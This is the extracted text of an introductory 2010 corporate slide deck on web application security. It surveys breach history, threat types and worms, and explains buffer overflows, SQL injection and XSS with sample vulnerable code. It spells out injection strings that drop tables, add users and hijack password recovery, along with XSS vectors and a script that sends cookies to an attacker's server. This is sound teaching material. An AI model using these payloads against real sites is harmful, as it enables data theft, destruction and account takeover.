Web application security

© 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.

Web Application Security

Sathya Narayana Panduranga

An Introduction


Nimda outbreak spreads worldwide (September 18, 2001)

The worm spread by emailing itself as an attachment, scanning for--and then infecting--vulnerable Web servers running Microsoft's Internet Information Server software,

Copying itself to shared disk drives on networks, and

Appending Javascript code to Web pages that will download the worm to Web surfers' PCs when they view the page.

Caused $530 million worth damages with in just first week of outbreak


CardSystems debacle (June, 2005)

In June 2005, information on a million credit cards were stolen from CardSystems through SQL Injection

Enquiry revealed that this company was keeping an unencrypted log of all (40 million) Credit Cards processed

The company was liquidated


Denial of Service Attack Takes Down Amazon, Wal-Mart (June, 2008)

Amazon.com was taken down for several hours by a distributed denial-of-service attack that struck the Web site's load-balancing system


ChoicePoint to Pay $15 million fine for Data Breach (Sept, 2010)

The April 2008 breach compromised the personal data of 13,750 people. For a 30-day period, an unknown hacker conducted thousands of unauthorized searches of a ChoicePoint database containing sensitive consumer information, including Social Security numbers


Understanding Threats

Defacement

Infiltration

Phishing

Pharming

Insider Threats

Denial of Service

Data theft / loss


Defacement Online Vandalism, attackers replace legitimate pages with

illegitimate ones

Targeted towards political web sites

Risk of public misinformation and potential liabilities

White House website defaced

by Anti-NATO Activists


Infiltration Unauthorized parties gain access to

resources of your computer system (e.g. CPUs, disk, network bandwidth)

Could gain read/write access to back-end DB

Data integrity and confidentiality at Risk


Phishing Attacker sets up spoofed site that looks real

Lures users to enter login credentials and stores them

Usually sent through an e-mail with link to spoofed site asking users to “verify” their account info

The links might be disguised through the click texts

Disguising Evil Link


Phishing Email

Phishing Website


Pharming (DNS Cache Poisoning)

Like phishing, attacker’s goal is to get user to enter sensitive data into spoofed website

The attacker targets the DNS service used by the customer.

Attacker makes DNS translate legitimate URL to their IP address instead and the result gets cached, poisoning future replies as well

User wants to go the website ‘www.nicebank.com’ and types the address in the web browser.

User’s computer queries the DNS server for the IP address of ‘www.nicebank.com’.

Since the DNS server has already been ‘poisoned’ by the attacker, it returns the IP address of the fake website to the user’s computer.



How Pharming is done Etc/hosts file manipulation DNS Cache poisoning (using vulnerabilities in DNS

query protocol, specific DNS server) Domain Hijacking Taking advantage of user typo errors


Insider Threats

Attacks carried out with cooperation of insiders

Insiders could have access to data and leak it

DB and Sys Admins usually get complete access

Threats Malware being bundled with legitimate software

Loss of confidentiality and Data


Denial of Service

Attacker inundates server with packets causing it to drop legitimate packets

Makes service unavailable, downtime = lost revenue

Particularly a threat for financial and e-commerce vendors

Can be automated through Botnets (DDos)


Data Theft or Data Loss

Several Examples: BofA, ChoicePoint, VA BofA: backup data tapes lost in transit

ChoicePoint: fraudsters queried DB for sensitive info (SQL Injection)

VA: employee took computer with personal info home & his home was burglarized

Can lead to Identity theft (resulting in liability to the company)


Means SQL Injection JavaScript Injection Worms Botnets Malware

Rootkits Keyloggers Trojans Adware Clickbots

Cross Site Scripting (XSS) Cookie Stealing Dictionary attack


Buffer Overflows

• Buffer overflow attack is a way to inject malicious code into a running program

• This way attacker takes control of the program


1 int checkPassword() {2 char pass[16];3 bzero(pass, 16); // Initialize4 printf ("Enter password: ");5 gets(pass);6 if (strcmp(pass, "opensesame") == 0)7 return 1;8 else9 return 0;10 }1112 void openVault() {13 // Opens the vault14 }1516 main() {17 if (checkPassword()) {18 openVault();19 printf ("Vault opened!");20 }21 }


Execution stack: maintains current function state and address of return function

Stack frame: holds vars and data for function

Extra user input (> 16 chars) overwrites return address Attack string: 17-20th chars can specify address of openVault() to bypass check

Address can be found with source code or binary

Return-into-libc attack: jump to library functions e.g. /bin/sh or cmd.exe to gain access to a

command shell (shellcode) and complete control


Considerations

One of the oldest and most common forms of security threats

Affects both stacks and heaps

Originally used by Nimda and Morris worms

Doesn’t affect Java/J2EE systems unless the Native code used by these systems is vulnerable

Program not employing careful bounds checking of input parameters

Targeted Vulnerability


Worms and other Malware

Worms spread across Internet through vulnerabilities in widely used software applications

History First Worm: Morris Worm (1988) Code Red (2001) Nimda (2001) Blaster (2003) SQL Slammer (2003)

Root-kits, Botnets, Spyware, other Malware


Worm vs Virus

Virus: program that copies itself into other programs Could be transferred through infected disks

Rate dependent on human use

Worm: a virus that uses the network to copy itself onto other computers

Worms propagate faster than viruses Large # of computers to infect

Connecting is fast (milliseconds)


Anatomy of the attack

Morris Worm Didn’t touch data but spiked NW traffic by propagating

(copying self)

Exploited Buffer Overflow in fingerd (Unix), vulnerability in sendmail debug mode

used a dictionary of 432 frequently used passwords to login and execute rexec and rsh

Code Red Worm Spread rapidly across the internet and defaced the home-

page of infected servers

Resident only in memory, no disk writes

Exploited MS IIS server buffer overflow vulnerability

Exploited “indexing server” feature by scanning for IP addresses to connect to other IIS servers


Anatomy of the attack…continued

Nimda Worm Worse form of Code Red worm

Used multiple propagation vectors: Server to server, server to client

The infected client sent Emails with Nimda as payload

Blaster Worm The infected machine would lauch a DDos attack on

Windows update site and then shut down the machine

The DDos attack prevented users from downloading the patch (fix)

Exploited Buffer Overflow vulnerability in Windows DCOM service


Other Malware

Rootkits: imposter OS tools used by attacker to hide his tracks

Botnets: network of software robots attacker uses to control many machines at once to launch attacks (e.g. DDoS through packet flooding, click fraud)

Spyware: software that monitors activity of a system or its users without their consent

Keyloggers: spyware that monitors user keyboard or mouse input, used to steal usernames, passwords, credit card #s, etc…

Trojan Horses: software performs additional or different functions than advertised

Adware: shows ads to users w/o their consent


Targeted Vulnerabilities

Organization not having / implementing good security policies

Program not handling buffer overflow vulnerability

Program relying on unknown 3rd party component (which may be vulnerable)

Keeping all the features turned on by default

No clear password policy (users having predictable passwords)


Client state manipulation: Record, manipulate and replay attack

HTTP is stateless: server may send state info to the client which echoes it back in future requests

When client state is stored un-encrypted for example in Hidden form fields it can be manipulated by an attacker

Unix curl and wget commands can be used for record-replay attack

Server based session management with strong session ids can mitigate the problem


Client State Manipulation: JavaScript Manipulation Evil user can just delete JavaScript code,

substitute desired parameters & submit! Could also just submit request & bypass

JavaScript

Warning: Data validation or computations done by JavaScript cannot be trusted by server Attacker may alter script in HTML code to modify

computations Attacker may use Javascript code to gain

additional intelligence about the application Must be redone on server to verify



Program not sanitizing input

Not expiring sessions

Writing sensitive information to cookies

Storing client-state un-encrypted

Not recognizing brute-force attacks

Unobfuscated JavaScript code


SQL Injection

SQL injection attacks are important security threat that can Compromise sensitive user data

Alter or damage critical data

Give an attacker unwanted access to DB


Attacker guesses the SQL used in the backend SELECT full_name, phone_number, ssn FROM

userinfo WHERE email = $EMAIL;

Let us say the attacker knows a valid email id ‘[email protected]’. He tries to find out if the application has a SQL injection vulnerability by SELECT userid FROM userinfo WHERE email =

‘[email protected]'';

The error message is sure shot giveaway to the SQL injection vulnerability

Inject an SQL to return every row in the table SELECT userid FROM userinfo WHERE email =

'anything' OR 'x'='x';

The clause is guaranteed to be true


Attacker wants to find out the field names SELECT fieldlist FROM table WHERE field = 'x' AND email

IS NULL; --'; If he gets a server error, it means our SQL is malformed and

a syntax error was thrown: it's most likely due to a bad field name.

If he gets any kind of valid response, he guessed the name correctly.

Finding the table name SELECT email, passwd, login_id, full_name FROM

userinfo WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';

If he gets any kind of valid response, he guessed the name correctly.

If the password is stored in clear text: bruteforce break in SELECT email, passwd, login_id, full_name FROM

userinfo WHERE email = '[email protected]' AND passwd = ‘hello123';

Tries multiple times with different common passwords until he breaks in


If the DB is not read-only SELECT email, passwd, login_id, full_name FROM

userinfo WHERE email = 'x'; DROP TABLE userinfo; --';

Adding a malicious user SELECT email, passwd, login_id, full_name FROM userinfo

WHERE email = 'x'; INSERT INTO userinfo ('email','passwd','login_id','full_name') VALUES ('[email protected]','hello','evil','Evil User');--';

Malicious password recovery SELECT email, passwd, login_id, full_name FROM userinfo

WHERE email = 'x'; UPDATE userinfo SET email = '[email protected]' WHERE email = '[email protected]';

Lets say the application provides a “I lost my password” link which emails password and lets say the attacker clicks on it-----------------------------------------------------

From: [email protected] To: [email protected] Subject: Intranet login This email is in response to your request for your Intranet log in information. Your User ID is: bob Your password is: hello --------------------------------------------------



Program not sanitizing inputs

Program not using appropriate privilege levels for accessing database

Program not validating the input source

Storing clear text passwords

Having guessable table and field names


Cross Site Scripting (XSS) Attacks

Security issues arising from browser interacting with multiple web apps (ours and malicious ones), not direct attacks

Cross-Site Request Forgery (XSRF)

Cross-Site Script Inclusion (XSSI)

Cross-Site Scripting (XSS)


Following jsp code reads employee code from HTTP request and displays to the user<% String eid = request.getParameter("eid"); %> ...

Employee ID: <%= eid %>

This code is vulnerable to Javascript injection and thus vulnerable to XSS

Try injecting the following script to vulnerable website

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

The above vulnerability is called non-persistent XSS vulnerability

<% ...

rs = stmt.executeQuery("select * from emp where id="+eid);

… String name = rs.getString("name");

%>

Employee Name: <%= name %> The above code has persistent XSS vulnerability


Cookie grabbing Execute the following code on vulnerable website

<IMG """><SCRIPT>alert(document.cookie)</SCRIPT>">

Various ways of injecting javascript

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<DIV STYLE="background-image: url(javascript:alert('XSS'))">


XSS Attacker can get a malicious script to be

executed in our application’s context

Malicious script could cause browser to send attacker all cookies for our app’s domain

<script> i = new Image(); i.src = "http://www.hackerhome.org/log_cookie?cookie=" + escape(document.cookie); // URL-encode</script>

Above Script injected to execute in our domain Can access document.cookie in DOM

Constructs URL on attacker’s server, gets saved in a log file, can extract info from cookie parameter


Sources of untrusted data

Query parameters, HTML form fields

Path of the URI which could be inserted into page via a “Document not found” error

Cookies, parts of the HTTP request header (e.g. Referer header)

Data inserted into a SQL DB, file system

3rd party data (e.g. RSS feed)


Securing the Enterprise

Physical Security

Technological Security Application Security

Operating System Security

Network Security

Policies and Procedures


Next Presentation

Brief discussion on 360 degree security

Fundamental Security Concepts

Security Design Principles

Best Practices and Solutions

Testing for Security (Being the hacker)

Security breach detection and mitigation

Tools

Ariba Buyer security assessment



Date post:	10-May-2015
Category:	Technology
Upload:	spanduranga
View:	214 times
Download:	2 times

Web application security

Technology